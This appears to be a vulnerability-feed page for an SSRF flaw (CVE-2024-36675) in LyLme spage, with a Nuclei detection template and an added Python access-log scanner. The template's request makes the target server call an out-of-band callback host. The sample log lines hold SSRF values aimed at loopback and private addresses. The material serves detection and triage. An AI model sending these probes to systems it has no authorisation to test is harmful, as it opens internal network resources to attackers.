LyLme spage v1.9.5 - Server-Side Request Forgery

03 Jul 2026 13:39:16 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

LyLme spage v1.9.5 has a high severity SSRF vulnerability via the url parameter in apply/index.php.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2024-36675 | 17 Jul 2025 11:50 | circl |
| CVE | CVE-2024-36675 | 4 Jun 2024 21:31 | cve |
| Cvelist | CVE-2024-36675 | 4 Jun 2024 21:31 | cvelist |
| EUVD | EUVD-2024-36181 | 4 Jun 2024 21:31 | euvd |
| NVD | CVE-2024-36675 | 4 Jun 2024 22:15 | nvd |
| Positive Technologies | PT-2024-27118 · Unknown · Lylme Spage | 4 Jun 2024 00:00 | ptsecurity |
| RedhatCVE | CVE-2024-36675 | 14 Feb 2025 05:37 | redhatcve |
| VulnCheck KEV | VulnCheck KEV: CVE-2024-36675 | 1 Aug 2025 00:00 | vulncheck_kev |
| Vulnrichment | CVE-2024-36675 | 1 Jan 1976 00:00 | vulnrichment |

id: CVE-2024-36675

info:
  name: LyLme spage v1.9.5 - Server-Side Request Forgery
  author: ritikchaddha
  severity: high
  description: |
    LyLme spage v1.9.5 is vulnerable to server-side request forgery (SSRF) via the url parameter in apply/index.php. An attacker can force the server to make arbitrary requests, potentially accessing internal resources.
  impact: |
    Unauthenticated attackers can force the server to make arbitrary requests via the url parameter, potentially accessing internal resources.
  remediation: |
    Update LyLme spage to a version later than v1.9.5 that patches the SSRF vulnerability.
  reference:
    - https://github.com/Hebing123/cve/issues/44
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36675
  classification:
    epss-score: 0.01426
    epss-percentile: 0.69697
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-36675
    cwe-id: CWE-918
    cpe: cpe:2.3:a:lylme:lylme_spage:1.9.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lylme
    product: lylme_spage
    fofa-query: title="LyLme Spage"
    shodan-query: http.favicon.hash:-282504889
  tags: cve,cve2024,ssrf,lylme,spage,oast,oob,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/apply/index.php?url=http://{{interactsh-url}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(interactsh_protocol, "http")'
          - 'contains_all(body, "title\":", "icon\":")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4b0a00483046022100ce0964fc5f1755ef44753e46cbfb38bfbbd6f935e624ae114546c15b35acbb5c022100b89382ef9c88ebc24c3732c5dad4589b5dca8b1a1bbb53d801afdf02de2cc5c7:922c64590222798bb761d5b6d8e72950
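
A defender-side check for the same request pattern in web server access logs, added here as an example (it is not part of the template or of LyLme spage): it lists every request that sets `url=` on `apply/index.php` and marks whether the value points at a non-public address. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/apply/index.php"  # path named in the template above
# Combined access-log format is an assumption; adjust the regex to your server.
REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

def classify_target(value):
    """Classify a url= value as 'internal', 'external' or 'other'."""
    try:
        parts = urlsplit(value)
        host = parts.hostname
    except ValueError:  # malformed authority, e.g. an unbalanced IPv6 bracket
        return "other"
    if parts.scheme not in ("http", "https") or not host:
        return "other"
    try:
        # Loopback, private, link-local and reserved ranges are all non-global.
        return "external" if ipaddress.ip_address(host).is_global else "internal"
    except ValueError:
        # Hostnames are not resolved here; resolve them during triage.
        local = host == "localhost" or host.endswith((".localhost", ".internal", ".local"))
        return "internal" if local else "external"

def scan(lines):
    """Return (client, url value, verdict) for each request that sets url= on ENDPOINT."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if not target.path.endswith(ENDPOINT):
            continue
        for value in parse_qs(target.query).get("url", []):  # parse_qs percent-decodes
            hits.append((m.group("client"), value, classify_target(value)))
    return hits

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2025:10:00:00 +0000] "GET /apply/index.php?url=http://127.0.0.1:8080/status HTTP/1.1" 200 312 "-" "curl/8.0"',
    '203.0.113.7 - - [01/Jan/2025:10:00:02 +0000] "GET /apply/index.php?url=http%3A%2F%2F10.0.0.5%2F HTTP/1.1" 200 298 "-" "curl/8.0"',
    '198.51.100.20 - - [01/Jan/2025:10:05:00 +0000] "GET /apply/index.php?url=https://example.org/ HTTP/1.1" 200 410 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [01/Jan/2025:10:05:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, value, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:8} {client:15} {value}")
```

Requests marked `external` are expected from legitimate submissions; `internal` and `other` verdicts are the ones to review first.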


Vulners AI Score: 6.1 (Medium risk), current as of 04 Feb 2026 07:00
CVSS 3.1: 9.1
EPSS: 0.01426